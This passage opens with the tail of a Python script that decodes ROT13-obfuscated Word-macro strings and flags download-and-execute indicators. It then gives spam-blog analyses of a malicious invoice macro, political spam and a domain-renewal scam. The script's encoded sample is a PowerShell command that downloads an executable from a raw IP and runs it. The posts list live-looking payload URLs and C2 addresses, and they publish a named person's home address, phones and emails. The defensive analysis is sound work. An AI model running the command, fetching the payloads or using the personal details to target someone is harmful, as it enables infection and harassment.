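    + string.ascii_uppercase[13:] + string.ascii_uppercase[:13],
)

def rot13(text: str) -> str:
    """Decode (or encode; ROT13 is its own inverse) a string."""
    return text.translate(_ROT13)

# Patterns for the chain seen in the decoded strings:
# WebClient.DownloadFile(url, dest) followed by Start-Process dest.
_URL_RE = re.compile(r"https?://[^'\"\s)]+", re.IGNORECASE)
_DROP_RE = re.compile(r"DownloadFile\(\s*'[^']*'\s*,\s*'([^']+)'", re.IGNORECASE)
_EXEC_RE = re.compile(r"Start-Process\s+'([^']+)'", re.IGNORECASE)

def analyse_command(cmd: str) -> dict:
    """Extract the IOCs from one decoded command line and flag the pattern."""
    url = _URL_RE.search(cmd)
    drop = _DROP_RE.search(cmd)
    execd = _EXEC_RE.search(cmd)
    return {
        "url": url.group(0) if url else None,
        "dropped_path": drop.group(1) if drop else None,
        "executed_path": execd.group(1) if execd else None,
        # Flag only when a file is downloaded AND that same file is launched.
        "download_and_execute": bool(
            drop and execd and drop.group(1).lower() == execd.group(1).lower()
        ),
    }

def analyse_encoded(encoded: str) -> dict:
    """Decode a ROT13-obfuscated macro string, then extract its IOCs."""
    decoded = rot13(encoded)
    result = analyse_command(decoded)
    result["decoded"] = decoded
    return result

# Constructed sample: the post's first decoded command, re-encoded with ROT13
# to stand in for the string as it appears inside the macro.
SAMPLE_ENCODED = (
    "pzq /X CbjreFuryy.rkr (Arj-Bowrpg Flfgrz.Arg.JroPyvrag).QbjaybnqSvyr("
    "'uggc://85.143.166.140/squgrcbcquq/fsojhejsy/jlkoqs.rkr',"
    "'%GRZC%\\WVBvbqsuvbVU.rkr');Fgneg-Cebprff '%GRZC%\\WVBvbqsuvbVU.rkr';"
)

if __name__ == "__main__":
    for key, value in analyse_encoded(SAMPLE_ENCODED).items():
        print(f"{key}: {value}")
```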

Recommended blocklist:


Malware spam: "T.A.G. (The Automotive Group) Ltd." / "Lawrence Fisher [l.fisher@taghire.co.uk]" / invoice

This fake invoice does not come from The Automotive Group Ltd or any similarly-named company. Their systems have not been compromised in any way. Instead, this is a forgery with a malicious attachment. Note that taghire.co.uk simply shows "Under Construction".

From:    Lawrence Fisher [l.fisher@taghire.co.uk]
Date:    16 February 2015 at 08:25
Subject:    invoice

Here is the invoice

Kind Regards,

Lawrence Fisher
T.A.G. (The Automotive Group) Ltd.
Unit 22 Coney Green Business Centre Wingfield View, Clay Cross, Chesterfield

Tel: 020 3750 0638

This e-mail is confidential and may be privileged.  It may be read, copied and used only by the intended recipient. If you have received it in error, please contact the sender immediately by return e-mail or by telephoning 020 3750 0638

So far I have only seen one sample of this, with an attachment named Invoice 0215.doc which has zero detections according to VirusTotal. It contains an obfuscated Word macro which downloads an additional component from:

http://laikah.de/js/bin.exe

Usually there are two or three versions of this document, but I have only seen one. If you look at the macro code itself, the download location is not encrypted in the code, although other elements of the process are encrypted with a string + key combination. Those combinations contain non-printable characters, possibly in an attempt to avoid analysis.

This .exe file is downloaded as %TEMP%\345435.exe and it has a VirusTotal detection rate of 3/57. Automated reporting tools [1] [2] [3] show that this POSTs to 37.139.47.105. It appears that communication is attempted with the following IPs:

37.139.47.105 (Pirix, Russia)
78.140.164.160 (Webazilla, US)
95.163.121.179 (Digital Networks, Russia)
86.104.134.156 (One Telecom, Moldova)
117.223.58.214 (BSNL / Broadband Multiplay, India)
109.234.38.70 (McHost, Russia)


Also, according to the Malwr report, a DLL is dropped with a detection rate of 3/57.

Recommended blocklist:

Wednesday, 15 October 2014

"Clean India" spam is an exercise in hypocrisy

"Clean India" is meant to be a campaign to clean up Indian politics. But one of the biggest problems they have in India is spam (which led to the long saga of Delhi minister Somnath Bharti's history of spam). So I think it is an act of sheer hypocrisy to promote this campaign through random spam.

From:     Ministry Of Urban Development [support@localcirclesemail.com]
Reply-To:     support@localcirclesemail.com
Date:     15 October 2014 11:24
Subject:     Swachh Bharat invite by Ministry Of Urban Development
Signed by:     localcirclesemail.com

Invited to Circle: Swachh Bharat
Founder: Ministry Of Urban Development
Members: 189975
Description: This circle brings together all citizens who want a Clean India. Through this circle, citizens will be able to share cleanliness initiatives, challenges, successes at a National Level as well as learn about best practices from each other. Members will also be able to give collective inputs to Ministry of Urban Development on an ongoing basis. Soon, members of this circle will have access to their local constituency circle on Swachh Bharat connecting them with fellow local residents and enabling them to organize/participate in clean up drives in their neighborhood/city. Together, let us make it a SWACHH BHARAT!


About LocalCircles
LocalCircles takes Social Media to the next level and makes it about Communities, Governance and Utility. It enables citizens to connect with communities for most aspects of urban daily life like Neighborhood, Constituency, City, Government, Causes, Interests and Needs, seek information/assistance when needed, come together for various initiatives and improve their urban daily life. LocalCircles is free for citizens and always will be! 

The spam originates from an Amazon AWS IP of 54.240.9.132; the spamvertised site localcircles.com is also hosted on Amazon AWS. The registration details are:

Registry Registrant ID:
Registrant Name: LocalCircles India
Registrant Organization: LocalCircles India Pvt Ltd
Registrant Street: 1105, 11th Floor,
Registrant Street: Advant Navis Business Park, Sector 142
Registrant City: Noida
Registrant State/Province: Uttar Pradesh
Registrant Postal Code: 201301
Registrant Country: India
Registrant Phone: +91.1204263558
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: info@localcircles.com


Google sums up localcircles.com's poor reputation nicely: We've found that lots of messages from localcirclesemail.com are spam.

As long as India tolerates spam and other dishonest business practices then I don't think that there's much chance of them cleaning up their act. I think whoever is sending out this spam needs to look much closer to home before criticising others.


Monday, 23 June 2014

"Domain Listing Expired" scam spam (ibulkmailer.com / 192.99.148.65)

I've received this spam to the contact details for several domains I own in the past few weeks:

Date:      Sun, 22 Jun 2014 07:53:10 +0200 [06/22/14 01:53:10 EDT]
From:      Domain Notification [chandan@gmail.com]
Reply-To:      chandan@gmail.com
Subject:      re: Domain Listing Expired

Attention: Important Notice

ATT: [redacted].COM
ADMINISTRATIVE CONTACT
[redacted].COM
[redacted]

[redacted].COM
Please ensure that your contact information is correct or make the necessary changes above

DOMAIN SERVICE NOTICE

Domain Name: [redacted].COM
Search Engine Submission

Pay By

June 30,2014
PART I: REVIEW SOLICITATION


Attn: [redacted].COM
As a courtesy to domain name holders, we are sending you this notification for your business Domain name search engine registration. This letter is to inform you that it's time to send in your registration and save.

Failure to complete your Domain name search engine registration by the expiration date may result in cancellation of this offer making it difficult for your customers to locate you on the web.

Privatization allows the consumer a choice when registering. Search engine subscription includes domain name search engine submission. You are under no obligation to pay the amounts stated below unless you accept this offer. Do not discard, this notice is not an invoice it is a courtesy reminder to register your domain name search engine listing so your customers can locate you on the web.

This Notice for: [redacted].COM will expire on June 15,2014 Act today!

DETAIL OF SERVICE: ANNUAL WEBSITE SEARCH ENGINE SUBMISSION FOR DOMAIN NAME [redacted].COM
Detail of Service:
SEARCH SUBMISSIONS
Act by Date:
06/15/2014
For Domain
Name:
[redacted].COM


Select Term     Your Existing Domain: [redacted].COM     Period Covered     Price
1year     Valid for 1 Year CLICK TO RENEW     06/15/2014 - 06/15/2015     $75.00
2year     Valid for 2 Year CLICK TO RENEW     06/15/2014 - 06/15/2016     $119.00
3year     Valid for 3 Year CLICK TO RENEW     06/15/2014 - 06/15/2017     $199.00
4year     -Most Recommended- CLICK TO RENEW     04/04/2014 - 04/04/2024     $295.00
5year     Limited time offer - Best value! CLICK TO RENEW     Lifetime     $499.00


Payment by Credit Card
Select the term and complete the form above, (do not reply this mail with your credit card details on this mail , just click on pay above. once we receive your pay we will send you details and report after payment is successful, also make sure you provide us with your correct information at time of signup.

Unsubscribe me from this list


Powered by Interspire

It looks like a domain renewal notice.. but it isn't. It's a renewal notice for SEO services. "But wait," I hear you cry, "I haven't signed up for any SEO services!" to which my answer is "Exactly!"

This is where the spam moves from being annoying to being more of a scam. The use of the word "Renew" implies that you already have a relationship with these people, but you do not. There is nothing to renew, and stating that this is something you already use is not only incorrect but in my personal opinion it is a fraudulent misrepresentation.

The link in the email goes to 192.99.148.65 (OVH Canada, not surprisingly) and then on to a landing page at ibulkmailer.com on 192.185.170.196 (Websitewelcome, US).


The WHOIS details for ibulkmailer.com are as follows:

Registry Registrant ID:
Registrant Name: kumar, chandan
Registrant Organization:
Registrant Street: DDA FLAT NO 556 PKT B HASTSAL
Registrant City: New Delhi
Registrant State/Province: Delhi
Registrant Postal Code: 110059
Registrant Country: IN
Registrant Phone: 7838808080
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: admin@ibulkmailer.com


WHOIS details can easily be faked, but the "Chandan" name in the registration details tallies with the address chandan@gmail.com in the spam itself.

An examination of the sites co-hosted with ibulkmailer.com, along with several other identifying factors, identifies this website as belonging to Chandan Kumar of CNS Web Technologies Pvt Ltd (U72300DL2009PTC191574) of India.

To save you from having to do the analysis yourself, a shortcut is to visit Chandan Kumar's LinkedIn page which links through to ibulkmailer.com in one of the "Company Website" links.


The contact details for Mr Kumar's company are below:

CNS Web Technologies Private Limited
625 LIG HASTSAL
VIKAS PURI
New Delhi
Delhi
110059
INDIA
+91-7838808080
chandan988@gmail.com
chandan_988@rediffmail.com
chandan_988@yahoo.com

If you get these spam messages (and the link still leads to ibulkmailer.com) then one effective way of dealing with it would be to forward the message to the webhost abuse department at abuse -at- websitewelcome.com.

Doing business with spammers is never a good idea, and doing business with spammers who misrepresent your relationship with them is likely to be a very bad idea indeed. Avoid.

The following domains are also associated with CNS Web Technologies and Chandan Kumar. Do with them what you will.
